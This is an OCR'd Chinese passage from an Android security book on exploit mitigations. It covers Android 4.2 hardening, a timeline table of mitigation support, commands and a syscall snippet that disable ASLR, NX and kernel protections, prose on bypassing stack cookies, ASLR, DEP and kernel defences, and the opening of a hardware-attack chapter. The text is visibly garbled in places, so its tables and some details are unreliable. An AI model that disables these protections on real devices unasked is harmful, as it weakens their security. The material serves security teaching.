Android 4.2 中 有 几 个 改动 进一步 提高 了 安全 性 。 首 先 ， 对 于 target API 大 于 等 于 17 的 应 用 ， 
谷歌 修改 了 其 中 Content Provider 的 exported 属性 默认 值 。 在 这 个 版 本 之 前 ， 即 使 没有 对 应 用 
程序 显 式 地 设置 exported, 所 有 的 Content Provider 也 都 默认 可 以 被 其 他 应 用 程序 访问 。 而 在 此 
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之 后 , 默认 的 sxported 值 变 为 false, 也 就 是 说 , 如果 应 用 程序 开发 者 想 将 其 Content Provider 
暴露 给 其 他 软件 访问 ， 就 需要 手动 显 式 地 将 这 个 属性 设置 为 true。 其 次 ， 这 个 版 本 还 更 新 了 
SecureRandonm 类 的 实现 。 这 样 , 在 使 用 同一 个 初始 种 子 值 时 , 伪 随 机 数 序列 输出 会 变 得 更 加 不 
可 预测 ,secureRandom 类 的 一 个 构造 函数 以 参数 形式 接受 一 个 随机 数 种 子 值 ,在 这 次 变动 之 前 ， 
如 果 使 用 这 个 构造 函数 ， 产 生 的 将 是 确定 的 随机 值 序列 。 也 就 是 说 , 创建 这 个 类 的 两 个 对 象 并 让 
其 使 用 相同 的 种 子 值 , 就 会 产生 完全 一 样 的 随机 数 序列 。 而 这 次 变动 之 后 , 这 种 情况 将 不 再 发 生 。 

最 近 ，Android 4.2.2 对 使 用 ADB 的 开发 者 访问 方式 进行 了 加 固 。2012 年 ，Robert Rowley 和 
Kyle Osborn 的 研究 工作 让 大 家 开始 关注 通过 ADB 进行 的 数据 窃取 。 虽 然 此 类 攻击 需要 对 设备 进 
行 物理 接触 ， 但 依然 有 两 种 方法 可 以 快速 便捷 地 实现 。 第 一 种 是 Juice Jacking， 指 攻击 者 使 用 一 
个 定制 的 手机 充电 器 引诱 没有 疑心 的 用 户 插入 设备 。 在 第 二 种 方法 中 , 攻击 者 则 直接 使 用 自己 的 
手机 和 一 条 特制 的 micro USB 线 从 其 他 用 户 的 手机 中 窃取 数据 ， 不 需要 其 他 计算 机 或 特殊 设备 。 
为 了 阻止 此 类 攻击 ， 谷 歌 开 启 了 一 个 名 为 ro.adb.secure 的 开关 设置 。 启 用 该 设置 后 ,任何 尝试 通 
过 ADB 访问 设备 的 机 器 都 需要 用 户 首先 进行 手动 许可 。 图 12-1 就 是 此 时 弹出 的 提示 框 。 















































































































































Allow USB debugging? 


The computers RSA key fingerprint is 


51:CF:2E:2C:9A:A1:13:1D'E7:A9:3F:55:CA:65:D2:C5 


Always allow from this computer 


Cancel 








图 12-1 ADB 白 名 单机 制 


当 Android 设备 连接 到 主机 时 , 主机 会 将 RSA 密 钥 提 交 给 设备 , 然后 将 该 密 钥 的 指纹 呈现 给 
用 户 以 获得 许可 ， 如 图 12-1 所 示 。 用 户 可 以 选择 记 住 这 台 主 机 的 密 钥 ， 使 对 话 框 以 后 不 再 弹出 。 
这 个 功能 既 缓解 了 Kyle Osborm 所 述 的 攻击 ， 也 可 以 防止 设备 丢失 或 被 盗 后 里 面 的 数据 被 访问 。 

需要 指出 的 是 ,本 节 介 绍 的 加 固 方案 并 不 完整 ,可 能 还 有 许多 其 他 改进 等 待 发 现 , 包括 本 书 
写作 期 间 被 陆续 实现 和 采用 的 其 他 机 制 。 


12.15 ”漏洞 利用 缓解 技术 总 结 


Android 第 一 个 发 布 版 本 中 的 漏洞 利用 缓解 技术 比 大 部 分 其 他 Linux 系统 少 。 这 很 让 人 这 异 ， 
因为 作为 许多 缓解 技术 的 实验 验证 平台 ，Linux 一 直 扮演 着 领路 人 的 角色 。Linux 被 移植 到 ARM 
平台 后 ， 却 很 少 有 人 关注 如 何在 这 个 平台 上 支持 这 些 缓解 技术 。 随 着 Android 变 得 越 来 越 流行 ， 
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其 安全 团队 逐渐 加 大 了 对 利用 缓解 的 获 盖 率 ， 来 保护 整个 生态 体系 。 到 果冻 豆 时 ，Android 已 经 
实现 了 大 部 分 现代 利用 缓解 技术 ， 并 且 承 庄 将 更 多 缓解 技术 加 入 进来 。 表 12-1 给 出 了 Android 
采用 各 类 缓解 技术 的 时 间 线 。 


表 12-1 Android 核心 系统 对 缓解 技术 的 支持 历史 





采用 的 缓解 技术 





2.3 


4.0 


4.0.2 


4.0.4 
4.1 


4.1.1 
4.2 


4:2,2 
4.3 


4.4 











在 Bionic 中 禁用 sn 格式 描述 符 
二 进 制 文件 编译 时 启用 栈 cookie ( -fstack-protector ) 



































使 用 safe iop 库 
使 用 加 固 的 dumalloc 








Se 


实现 calloc 整数 洪 出 检查 





在 内 核 中 支持 XN 

















二 进 制 文件 编译 时 启用 不 可 执行 的 栈 和 堆 机 制 
官方 文档 称 加 入 了 mmap_min_adgr 


二 进 制 文件 编译 时 使 用 -wformat-security -Werror=format-security 



































随机 化 栈 地 址 











随机 化 mmap( 库 文件 、 
随机 化 堆 地 址 

















匿名 映射 ) 的 地 址 














chow 、chmod 和 mkdir 改 为 使 用 NOFOLLOW 标志 
将 umask 默认 值 改 为 0077 


限制 READ_LOGS 
随机 化 linker 的 段 地 址 
二 进 制 文件 编译 时 使 用 
二 进 制 文件 编译 时 使 用 


PH 



























































引入 隔离 的 Service 








RELRO 和 BIND_NOW 


PIE 


启用 dmesg_restrict 和 kptr_restrict 


将 mmap_min_aggr 的 值 增 至 32768 
Content Provider 默认 不 再 





[sa 














3 和 

















为 SecureRandom 引入 更 多 的 种 子 使 其 无 法 预测 








开始 使 用 FORTIFY_SOU 

















默认 启用 ro.adb.secure 

















RCE=1 


加 入 SELinux 并 启用 permissive 模式 


移 除 所 有 使 用 了 setuid 和 setgia 的 程序 
阻止 应 用 执行 set-uid 程序 

实现 在 zygote 和 adbd 中 减少 Linux 能 力 
SELinux 启用 enforcing 模式 


开始 使 用 FORTIFY_SOURCE=2 
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除了 在 操作 系统 自身 中 实现 各 类 缓解 技术 , 还 需要 在 AndroidNDK 中 加 入 相应 支持 。 表 12-2 
给 出 了 在 Android NDK 中 默认 启用 各 类 ( 编译 器 支持 的 ) 缓解 技术 的 时 间 线 。 


表 12-2 ” Android NDK 对 缓解 技术 的 支持 历史 






























































版 ”本 引入 的 缓解 技术 
1 二 进 制 文件 编译 时 使 用 栈 cookie ( -fstack-protector ) 
4b 二 进 制 文件 编译 时 启用 不 可 执行 的 栈 和 堆 机 制 
8b 二 进 制 文件 编译 时 使 用 RELRO 和 BIND_NOW 
gc 二 进 制 文件 编译 时 使 用 PIE 
9 二 进 制 文件 编译 时 使 用 -wformat-security -Werror=format-security 








12.16 ”禁用 缓解 机 制 


有 时 候 需 要 临时 禁用 一 些 缓解 机 制 ， 比 如 开发 漏洞 利用 代码 或 者 进行 简单 的 实验 时 。 有 些 组 
解 机 制 很 容易 禁用 ,但 是 有 些 很 难 做 到 。 本 节 介 绍 如 何 有 意 地 禁用 这 些 保护 措施 。 如 果 在 日 常 使 
目的 设备 上 禁用 系统 级 的 缓解 机 制 ， 则 需要 特别 小 心 ， 因 为 这 会 让 系统 更 容易 被 攻破 。 
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12.16.1 更 改 personality 


禁用 缓解 机 制 的 第 一 个 方法 是 使 用 Linux 的 personality 系统 调用 ,这 也 是 最 灵活 的 方法 。 
setarch 程序 就 使 用 了 这 个 功能 。 它 可 以 对 每 个 进程 分 别 禁用 随机 化 、 执 行 保护 以 及 设置 其 他 一 些 
标志 。 最 新 的 GDB 中 有 一 个 默认 启用 的 disable-randomization 设置 ， 也 用 到 了 这 个 
personality 系统 调用 。 当 前 的 Linux 内 核 允 许 禁 用 随机 化 ,但 是 不 允许 将 内 存 映 射 到 零 地 址 。 
此 外 ，setarch 在 x86_64 的 机 器 上 无 法 禁用 执行 保护 。 不 要 高 兴 得 太 早 ， 在 执行 set-uid 程序 时 
personality 设置 会 被 忽略 。 本 节 后 面 会 介绍 禁用 这 些 保护 措施 的 其 他 方法 。 

在 Android 的 Bionic C 运行 时 库 中 并 没有 实现 personality 系统 调用 函数 ， 不 过 底层 的 
Linux 内 核 仍 然 支 持 它 。 因 此 ， 可 以 直接 实现 对 这 个 系统 调用 的 使 用 ， 相 关 的 代码 片段 如 下 : 

#include <sys/syscall.h> 


#include <linux/personality.h> 
#define SYS_ personality 136 /* ARM syscall number */ 




































































int persona; 


persona = syscall (SYS personality, 0xffffffff).; 
persona |= ADDR_NO_RANDOMIZE; 
syscall (SYS_personality, persona); 


这 里 使 用 personality 系统 调用 来 禁用 该 进程 的 随机 化 。 第 一 次 调用 获取 了 当前 的 
personality 设置 ; 接 下 来 设置 好 需要 的 标志 ， 再 次 执行 这 个 系统 调用 , 使 新 的 persona 值 生 
效 。 在 Android NDK 的 linux/personality.h 文件 里 可 以 找到 其 他 可 以 使 用 的 标志 。 
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12.16.2 ”修改 二 进 制 文件 


前 面 介绍 过 , 许多 缓解 技术 由 二 进 制 可 执行 文件 中 的 设置 标志 位 所 控制 。 防 止 数 据 执行 、 基 
于 PIE (位 置 无 关 的 可 执行 文件 ) 的 基 址 随机 化 和 只 读 重 定位 表 等 都 依赖 于 二 进 制 可 执行 文件 中 
的 标志 位 。 然 而 ， 通 过 修改 二 进 制 文件 来 禁用 PIE 或 relro 缓解 机 制 并 不 容易 。 幸 好 ， 通 过 刚刚 
介绍 的 personality 调用 可 以 禁用 PIE 随机 化 ， 而 使 用 execstack 工具 则 可 以 禁用 防止 数据 
执行 的 机 制 。 下 面 来 看 如 何 做 到 后 者 : 


dev:~/android $ cp cat-gn-takju cat-gn-takju-CLEARED 

dev:~/android $ execstack -s cat-gn-takju-CLEARED 

dev:~/android $ readelf -a cat-gn-takju-CLEARED | grep GNU_STACK 
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0 


执行 上 述 命令 后 , cat -gn-takju-CLEARED 文件 的 栈 、 堆 和 其 他 内 存 区 域 就 都 可 以 执行 了 。 


shell@android:/ $ /system/bin/cat /proc/self/maps | grep ' ..xXp ' | wc -1 
9 






























































shell@android:/ $ cd /data/local/tmp 

shell@android:/data/local/tmp S$ ln -s cat-gn-takju-CLEARED cat 
shell@android:/data/local/tmp $ ./cat /proc/self/maps | grep ' ..xp ' | wc -1 
EY 


可 以 看 到 ， 原 来 的 二 进 制 文件 只 有 9 个 可 执行 内 存 区 域 ， 而 清除 GNU_STACK 标志 后 ， 可 执 
行内 存 区 域 则 增加 到 了 32 个。 事实 上 ,只 有 1 块 内 存 区 域 不 可 执行 ! 








12.16.3 ”调整 内 核 


通过 调整 内 核 的 可 配置 参数 ， 也 就 是 所 谓 的 sysctl， 可 以 在 系统 全 局 范围 内 禁用 许多 保护 机 
制 。 调 整 的 方法 很 简单 ， 只 需 将 新 的 配置 值 写 和 人 proc 文件 系统 中 相应 的 配置 项 即 可 。 将 一 个 数 
值 写 入 proc/sys/vm/mmap min addr 就 可 以 修改 零 地 址 页 保护 机 制 : 写 入 0 会 禁用 整个 保护 ; 写 
入 其 他 数值 则 会 将 用 户 空 间 程 序 可 以 成 功 映 射 的 最 小 地 址 设置 为 这 个 指定 的 值 。 
/proc/sys/kernel/kptr_ restrict 用 于 配置 内 核 指针 信息 保护 : 设置 为 0 可 以 禁用 这 一 保护 , 输出 所 有 

旧 针 值 ; 设置 为 1 时 只 允许 root 用 户 获得 指针 值 ; 而 设置 为 2 则 会 将 指针 完全 保护 起 来 。 将 
/proc/sys/kerneldmesg restrict 设置 为 0 可 以 禁用 对 系统 日 志 输 出 的 限制 。 通 过 /proc/sys/kernel/ 
randomize_va_space 可 以 控制 地 址 空间 布局 随机 化 : 设置 为 0 时， 将 在 系统 全 局 范围 内 禁用 所 有 
的 随机 化 ; 设置 为 1 时 ,会 启用 除 堆 以 外 所 有 内 存 区 域 的 随机 化 ; 设置 为 2 时 ,会 告诉 内 核对 
所 有 内 存 区 域 (包括 堆 ) 启用 随机 化 。 

虽然 在 学 习 和 探索 的 过 程 中 手动 禁用 各 类 缓解 技术 很 有 用 , 但 是 假定 攻击 的 目标 系统 处 于 这 

种 脆弱 状态 是 不 明智 的 。 要 展开 成 功 的 攻击 ， 通 常 需要 对 抗 或 者 绕 过 这 些 缓解 技术 。 


12.17 ” 对抗 缓 解 技术 


随 着 越 来 越 多 的 缓解 机 制 被 引入 系统 当中 , 漏洞 利用 的 开发 者 必须 不 断 适应 这 一 局 面 。 每 当 
一 种 新 技术 被 公布 时 , 安全 研究 员 就 会 迅速 开始 思考 如 何 进 行 对 抗 。 通过 深入 理解 这 些 技 术 的 特 
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点 并 跳出 各 类 局 限 来 思考 ,他 们 取得 了 相当 大 的 成 功 。 因 此 ， 对 抗 堆 加 固 、 栈 缓冲 区 保护 、 执 行 
保护 、ASLR 和 其 他 保护 技术 的 方法 开始 变 得 广为人知 。 很 多 论文 、 报 告 、 幻 灯 片 、 博 客 、 文 章 
和 利用 代码 都 详细 地 介绍 了 这 些 技 术 。 本 节 将 简要 介绍 对 抗 栈 cookie、ASLR、 执 行 保护 和 内 核 
缓解 机 制 的 技术 ， 但 不 会 面面俱到 。 


12.17.1 ”对 抗 栈 保护 


我 们 知道 , 栈 保 护 技术 的 工作 原理 是 在 函数 栈 帧 里 放 入 cookie 值 , 然后 对 其 进行 验证 。 这 种 
保护 方法 存在 一 些 很 关键 的 缺陷 。 首 先 ,编译 需 通 过 启发 式 方法 或 者 人 工 干 预 来 决定 哪些 函数 要 
使 用 栈 cookie。 为 了 尽 可 能 减少 对 性 能 的 影响 ， 如 果 函 数 中 没有 存储 在 栈 上 的 缓冲 区 ， 就 不 会 对 
其 使 用 这 一 机 制 。 而 且 ， 如 果 函 数 使 用 了 包含 小 数组 的 结构 体 或 联合 体 ， 就 可 能 不 会 受到 保护 。 
其 次 ,cookie 值 只 在 函数 返回 时 才 被 验证 。 如 果 攻 击 者 要 在 栈 中 破坏 的 东西 在 函数 返回 前 就 已 经 
被 用 到 ， 则 可 能 会 躲 开 这 一 保护 机 制 。 比 如 在 zergRush 漏洞 利用 中 ， 开 发 者 就 破坏 了 栈 帧 中 的 
一 个 局 部 变量 。 这 个 被 破坏 的 变量 在 存在 漏洞 的 函数 返回 前 就 被 释放 ， 从 而 出 现 了 use-after-free 
的 情况 。 最 后 ， 如 果 进 行 足够 多 的 尝试 , 攻击 者 还 是 有 可 能 正确 地 猜 到 cookie 值 。 许 多 不 常 被 考 
虑 到 的 情况 可 能 会 让 这 类 攻击 变 得 容易 ， 比 如 cookie 的 箭 很 低 ， 或 者 为 每 个 连接 请 求 fork 出 网 
络 服务 。 因此, 虽然 栈 缓冲 区 保护 机 制 可 以 防止 一 些 情况 下 的 漏洞 利用 , 但 无 法 防范 所 有 的 情形 。 





















































12.17.2 对抗 ASLR 


虽然 ASLR 让 许多 漏洞 利用 的 开发 变 得 更 具 挑战 性 , 不 过 还 是 有 许多 对 抗 的 技巧 。 此 前 已 经 
说 过 , 对抗 ASLR 最 简单 的 方法 是 利用 尚未 被 随机 化 的 内 存 区 域 。 此 外 , 攻击 者 还 可 以 使 用 堆 喷 
射 技 术 ， 让 其 控制 的 数据 到 达 内 存 中 可 预测 的 位 置 。 这 个 问题 在 32 位 处 理 器 的 地 址 空间 中 更 加 
严重 ， 尤 其 是 在 未 启用 数据 可 执行 保护 机 制 的 情况 下 。 

其 次 ， 攻 击 者 可 以 利用 信息 泄露 漏洞 ， 从 而 得 到 进程 的 地 址 空间 布局 。 堆 喷射 技术 其 实在 
ASLR 之 前 就 出 现 了 ， 但 是 最 近 才 变 得 流行 起 来 。 

最 后 ,攻击 者 还 可 以 利用 这 样 一 种 实际 情况 : 当 进 程 启动 时 ， 随 机 化 会 生效 , 但 如 果 进 程 是 
由 一 个 程序 fork 而 来 ， 则 不 会 再 次 随机 化 。 使 用 fork 系统 调用 后 ， 新 进程 的 地 址 空间 布局 会 和 
原来 的 进程 完全 一 样 。 这 种 范式 在 Android 上 的 一 个 例子 是 Zygote。Zygote 利用 fork 机 制 来 启 
动 所 有 应 用 程序 ， 而 这 些 应 用 程序 拥有 一 个 巨大 的 、 共 享 的 、 预 先 填充 的 地 址 空间 ， 让 启动 过 程 
的 开销 变 得 非常 小 。 由 于 这 样 的 设计 , Android 设备 上 的 任何 一 个 应 用 程序 都 可 以 泄露 内 存 地 址 ， 
并 成 功 地 执行 栈 上 数据 。 比 如 ,一 个 恶意 的 应 用 程序 可 以 将 其 内 存 地 址 信息 发 送 到 远程 的 网 站 上 ， 
用 于 在 该 设备 的 浏览 器 中 有 效 地 造成 内 存 破坏 并 进行 利用 。 尽 管 会 给 漏洞 利用 开发 者 带 来 挑战 ， 
但 这 些 也 是 对 抗 ASLR 的 有 效 方法 。 


12.17.3 “对抗 数据 执行 保护 
虽然 阻止 数据 执行 可 以 让 漏洞 利用 变 得 更 加 困难 , 但 其 真正 的 潜力 直到 与 完全 的 ASLR 结合 
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才 真正 被 人 们 所 认识 到 。 要 对 抗 这 种 保护 , 通常 需要 在 地 址 空间 中 一 个 可 以 预测 的 地 址 上 找到 一 
块 包含 可 执行 数据 的 内 存 区 域 。 如 果 找 不 到 这 样 一 块 区 域 , 攻击 者 还 可 以 利用 信息 泄露 问题 找 出 
可 执行 代码 的 位 置 。 接 下 来 , 使 用 第 9 章 中 详细 介绍 的 ROP 技术, 攻击 者 就 可 以 将 代码 片段 拼接 
在 一 起 来 达到 目标 了 。 总 之 , 这 种 缓解 技术 的 强大 程度 取决 于 与 其 结合 使 用 的 ASLR 的 强大 程度 。 


12.17.4 ”对抗 内 核 级 保护 机 制 


许多 内 核 级 保护 机 制 都 很 容易 被 绕 过 ， 比 如 kptr_restrict 和 dmesg_restrict (用 于 
针对 本 地 攻击 隐藏 内 核 地 址 空间 的 敏感 信息 )。 还 有 ，Android 设备 使 用 了 恋 入 boot 分 区 中 的 一 
个 预 编 译 内 核 。 如 果 没 有 内 核 级 的 ASLR， 要 找 出 关键 函数 和 数据 结构 的 内 核 地 址 ， 只 需 获 得 并 
分 析 目 标 设备 的 内 核 镜 像 文 件 即 可 。 任 何人 都 可 以 从 官方 系统 镜像 、OTA 更 新 或 者 自己 的 设备 
中 提取 出 该 内 核 镜 像 文件 。 

即便 启用 了 内 核 级 ASLR， 这 个 问题 依然 存在 。 此 时 ， 如 果 攻 击 者 找到 内 核 的 基地 址 ,将 其 
与 之 前 从 内 核 镜 像 文件 中 获得 的 数据 相 结 合 , 就 可 以 找到 关键 的 内 核对 象 ; 而 通过 缓存 定时 攻击 
(cache timing attack ) 就 可 以 轻松 地 找 出 内 核 基地 址 。 虽 然 可 以 使 用 自 定义 的 内 核 来 修复 这 个 问 
题 ， 但 这 并 非 一 个 可 以 用 于 所 有 设备 的 方案 。 首 先 ， 如 果 设 备 的 bootloader 是 锁 上 的 ， 就 没 办 法 
在 其 上 运行 一 个 自 定义 的 内 核 ; 其 次 ,即便 没 有 该 障碍 ， 绝 大 部 分 消费 者 也 没有 意愿 、 时 间 和 技 
能 来 定制 一 个 内 核 。 因 此 ,由 于 可 以 获得 并 预测 内 核 镜像 ， 对抗 内 核 的 地 址 泄露 保护 机 制 是 很 容 
易 的 。 

即便 将 这 些 缓解 技术 都 部 署 到 当前 的 系统 中 , 攻击 者 也 不 会 就 此 退缩 。 将 它们 结合 起 来 确实 
可 以 让 攻击 变 得 更 为 困难 , 但 攻击 者 还 是 会 去 寻找 新 的 方法 来 达到 目标 。 不 管 怎 样 ， 这 些 缓解 技 
术 确 实 增加 了 攻击 成 本 ， 提 高 了 攻击 复杂 度 ， 甚 至 完全 阻止 了 许多 漏洞 被 利用 。 在 未 来 ， 随 着 更 
多 缓解 技术 的 研究 、 开 发 和 部 署 ， 漏 洞 利用 可 能 会 变 得 更 加 困难 。 


12.18 ”展望 未 来 


虽然 无 法 确切 地 预测 未 来 ， 不 过 可 以 确定 的 是 ，Android 安全 团队 会 为 研发 和 部 署 漏洞 利用 
缓解 技术 投入 很 多 。 一些 进行 中 的 官方 项 目 很 可 能 会 在 将 来 的 Android 版 本 发 布 时 被 引入 。 还 有 
一 些 加 固 ARM Linux 甚至 专门 加 固 Android 的 工作 可 能 会 被 采用 。 此 外 ，Linux 和 Windows 等 
PC 操作 系统 中 的 一 些 相关 技术 也 有 希望 得 到 移植 。 无 论 最 终 采 纳 哪 种 缓解 技术 ， 都 几乎 可 以 肯 
定 Android 中 会 有 越 来 越 多 的 漏洞 利用 缓解 技术 。 


12.18.1 ”进行 中 的 官方 项 目 


在 研究 Android 现 有 的 缓解 技术 时 ， 我 们 发 现 一 个 ticket 显示 了 谷歌 可 能 正在 研究 更 细 粒 度 
的 沙 盒 技术 。 虽 然 Android 已 经 使 用 了 沙 盒 机 制 ,但 是 相当 粗糙 .这 个 ticket 位 于 https:/code.google. 
com/p/chromium/issues/detail?id=166704， 指 向 在 Android 上 对 seccomp-bpf 沙 盒 的 实现 。 这 个 沙 
盒 机 制 能 以 进程 粒度 启用 或 禁用 内 核 提 供 的 功能 ,已 经 被 用 于 Chrome OS 和 Linux 上 的 Chromium 























































































































326 第 12 章 漏洞 利用 缓解 技术 














浏览 器 , 但 是 不 清楚 是 否 会 被 部 署 到 Android 上。 即便 部 署 , 也 不 清楚 是 用 于 Android 系统 本 身 ， 
还 是 仅 用 于 Android 上 的 Chrome 浏览 器 。 


12.18.2 ”社区 的 内 核 加 固 工作 


除了 谷歌 官方 的 工作 , 还 有 许多 社区 的 开源 项 目 致力 于 进一步 加 固 Linux 内 核 , 包括 来 自 上 
游 Linux 内 核 自身 的 几 个 项 目 ， 以 及 来 自 独立 第 三 方 团体 的 一 些 项 目 。 尽 管 不 确定 这 些 项 目 最 后 
是 否 会 进入 官方 发 布 的 Android， 但 在 未 来 不 乏 可 能 。 

过 去 几 年 ，Kees Cook 一 直 在 努力 将 文件 系统 链接 保护 机 制 加 入 官方 的 Linux 内 核 源 代码 ; 
但 直到 最 近 发 布 的 Linux 3.6, 这 一 目标 才 得 以 实现 。 这 是 一 个 双重 的 保护 技术 。 首 先 ， 它 会 检查 
所 有 的 符号 链接 ， 确 保 其 满足 特定 的 条 件 。 下 面 摘录 Kees 在 commit 中 的 一 段 话 : 





















































这 个 方案 让 符号 链接 在 下 列 情况 下 才能 被 访问 : 该 链接 指向 一 个 全 局 可 写 的 目录 ; 
该 符号 链接 本 身 的 uid 和 访问 者 相符 ; 所 指向 目录 的 所 有 者 是 该 符号 连接 的 所 有 者 。 





启用 这 些 限 制 可 以 防止 符号 链接 攻击 ， 包 括 被 许多 Android root 工具 所 利用 的 攻击 。 其 次 ， 
低 权 限 用 户 再 也 无 法 创建 硬 链接 指向 非 其 所 有 或 无 法 访问 的 文件 。 这 两 个 保护 机 制 的 结合 可 以 让 
许多 基于 文件 系统 的 攻击 无 法 成 功 。 可 展 的 是 ,在 写作 本 书 时 ， 还 没有 Android 设备 在 出 厂 时 使 
用 3.6 版 的 内 核 。 将 来 的 设备 中 很 可 能 会 包含 并 启用 这 一 保护 方案 。 

长 期 以 来 ，Linux 内 核 开 发 者 社区 中 就 一 直 在 讨论 对 内 核 ASLR 的 实现 。 当 前 的 许多 操作 系 
统 都 已 经 使 用 了 这 一 技术 ， 如 Windows、Mac OSX 和 iOS。12.17 节 谈 到 ， 这 一 技术 为 对 抗 本 地 
攻击 提供 的 保护 相对 较 少 ; 不 过 它 还 是 可 以 为 远程 攻击 增加 难度 。 这 个 保护 技术 可 能 会 在 上 游 
Linux 内 核 中 得 以 实现 ， 然 后 进入 Android 设备 。 

在 PC 领域 , 英特尔 最 新 发 布 的 缓解 机 制 包括 基于 硬件 的 管理 者 模式 访问 保护 技术 
( Supervisor Mode Access Protection ，SMAP ) 和 管理 者 模式 执行 保护 技术 ( Supervisor Mode 
Execution Protection，SMEP )。 这 些 技术 用 于 防止 内 核 空 间 的 代码 访问 或 内 核 空 间 中 的 数据 执行 。 
当前 的 ARM 处 理 需 包含 一 些 特性 ， 可 以 实现 类 似 的 保护 机 制 。Brad Spengler 是 一 位 经 验 丰富 的 
内 核 研 究 人 员 ， 也 是 grsecurity 项 目的 维护 者 ， 他 开发 并 在 网 站 上 发 布 了 许多 对 ARM Linux 内 核 
的 加 固 补 丁 。 这 些 补 丁 包括 UDEREF 和 PXN 两 种 保护 技术 ,分 别 类 似 于 SMAP 和 SMEP。 虽 然 
这 些 保护 机 制 很 重要 ， 但 现在 还 没有 迹象 表明 会 将 其 部 署 到 未 来 的 Android 设备 中 。 

还 有 项 工作 值得 一 提 。2012 年 9 月 ，Subreption 公司 宣布 了 一 项 美国 国防 部 高 级 研究 计划 署 
( DARPA ) 资助 的 项 目 ， 名 为 SAFEDROID。 该 项 目的 目标 包括 改进 ASLR， 加 固 内 核 堆 ， 以 及 
改进 内 核 空间 和 用 户 空 间 的 内 存 保护 措施 。 这 些 目标 虽然 显得 吊 员 逼 人 , 但 也 令 人 钦佩 。 它 们 会 
为 内 核 级 漏洞 利用 带 来 严峻 的 挑战 。 可 惜 的 是 ， 直 到 本 书写 作 时 ， 这 个 项 目 似 乎 还 未 取得 成 功 。 




















































































































12.18.3 一 些 预测 


除了 前 面 提 到 的 项 目 ， 还 有 一 些 加 固 措施 可 能 会 被 实现 。iOS 使 用 的 强制 性 代码 签名 对 阻碍 
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漏洞 利用 代码 的 开发 非常 有 效 。 虽 然 在 Android 中 使 用 此 类 严格 限制 也 会 产生 类 似 的 效果 , 但 是 
可 能 性 不 大 ， 因 为 这 么 做 会 对 Android 应 用 程序 开发 社区 的 开放 性 产生 负面 影响 。 另 一 方面 ， 虽 
然 Android 从 一 开始 就 引入 了 safe iop 库 , 但 并 没有 广泛 使 用 。Android 加 固 的 后 续 合 理 动作 是 进 
一 步 使 用 这 个 库 。 我 们 无 法 准确 预测 Android 缓解 技术 的 未 来 ， 只 有 时 间 能 告诉 我 们 将 来 还 有 哪 
些 缓解 技术 会 被 加 入 Android 中 去 。 








12.19 小结 


本 章 介绍 了 漏洞 利用 缓解 技术 的 概念 以 及 在 Android 系统 上 的 使 用 方法 , 然后 解释 了 实现 这 
些 缓解 技术 需要 改动 硬件 、Linux 内 核 、Bionic C 库 、 编 译 工具 链 等 组 件 。 对 于 每 种 缓解 技术 ， 
都 介绍 了 其 背景 情况 、 实 现 效 果 以 及 Android 采 用 的 历史 。 还 给 出 了 一 个 总 结 表格 ， 详 细 列 举 了 
Android 支持 这 些 缓解 技术 的 历史 发 展 。 接 下 来 ， 介绍 了 如 何 有 意 禁 用 这 些 利 用 缓解 机 制 ， 以 及 
如 何 进行 对 抗 。 最 后 ， 对 Android 上 漏洞 缓解 技术 的 未 来 作出 了 展望 。 

下 一 章 会 讨论 如 何 攻击 与 Android 设备 类 似 的 艇 入 式 系统 硬件 ,介绍 用 于 攻击 硬件 的 工具 和 
技术 ， 以 及 这 类 攻击 成 功 后 的 情况 。 














硬件 层 的 攻击 


























对 于 各 种 各 样 的 移动 硬件 平台 ,Android 有 很 好 的 可 移植 性 和 通用 性 , 因此 在 移动 领域 几乎 
无 处 不 在 , 取得 了 巨大 的 成 功 。Android 的 可 移植 性 和 灵活 性 还 使 其 成 为 了 不 错 的 藤 入 式 设备 操 
作 系统 。Android 开放 、 可 定制 性 强 , 更 容易 快速 开发 出 可 视 化 用 户 界面 ,这 些 优点 与 其 他 嵌入 
式 Linux 系统 、 实 时 操作 系统 和 私有 操作 系统 相 比 尤 为 明显 。 目 前 ，Android 已 经 成 为 各 类 新 型 
诅 和 人 式 设备 中 操作 系统 的 事实 标准 ， 被 广泛 用 于 电子 书 阅读 需 、 机 顶 盒 娱乐 系统 、 飞 机 机 载 娱 
乐 系统 、“ 智 能 ”电视 、 室 内 气候 控制 系统 、 销 售 系统 等 设备 中 ( 这 里 只 列举 了 一 些 常 见 设备 )。 
由 于 Android 在 众多 类 型 的 设备 上 运行 , 本 章 会 尽 可 能 介绍 对 这 些 设备 的 硬件 进行 攻击 和 逆向 的 
技术 。 

在 传统 的 风险 和 威胁 模型 中 ,一 般 认为 物理 接触 到 设备 就 已 经 “游戏 结束 ”了 ,因此 威胁 评 
级 较 低 。 然 而 ， 许 多 情况 下 的 “物理 ”技术 也 可 以 用 于 漏洞 研究 ， 从 而 发 挥 重 大 作用 。 例 如 ， 假 
设 可 以 连接 到 路 由 器 或 者 交换 机 上 一 个 未 受 保护 的 调试 接口 ,只 要 访问 得 当 , 攻击 者 就 可 以 藉 此 
任意 寻找 便 编 码 的 加 密 密 钥 或 者 其 他 远程 可 利用 漏洞 。 可 以 物理 接触 到 设备 还 意味 着 攻击 者 可 以 
取出 其 中 的 芯片 进行 逆向 工程 , 其 影响 绝 不 仅仅 是 损失 用 于 研究 的 几 台 设备 而 已 。 本 章 会 介绍 一 
些 简单 的 工具 和 技术 , 用 于 降低 从 硬件 角度 研究 嵌入 式 设备 安全 性 的 入 门 门槛 。 通过 物理 接触 目 
标 设备 并 配合 使 用 这 些 简单 的 技巧 , 既 可 以 获得 其 中 包含 的 软件 代码 , 也 可 以 通过 硬件 接口 来 攻 
击 这 些 软件 。 一 旦 克服 了 硬件 层面 的 困难 ， 就 可 以 再 次 使 用 许多 基于 软件 的 漏洞 利用 技术 和 逆 
向 技术 ， 比 如 用 反 汇 编 器 寻找 固件 中 的 漏洞 ， 探 索 针 对 USB 等 硬件 接口 中 数据 传输 的 专 有 协议 
解析 器 等 。 这 些 技术 很 简单 ， 完 全 不 需要 深入 核心 的 电子 工程 学 领域 。 其 中 绝 大 部 分 技术 相对 来 
说 是 被 动 形式 的 ， 比 如 调试 、 总 线 监控 、 设 备 模 拟 等 ; 不 过 还 是 有 少数 技术 会 对 目标 设备 产生 轻 
微 的 毁坏 。 


13.1 设备 的 硬件 接口 


逆向 工程 人 员 或 者 漏洞 研究 人 员 首 先 要 做 的 , 是 枚 举 能 够 通过 哪些 方式 从 物理 层 与 目标 设备 
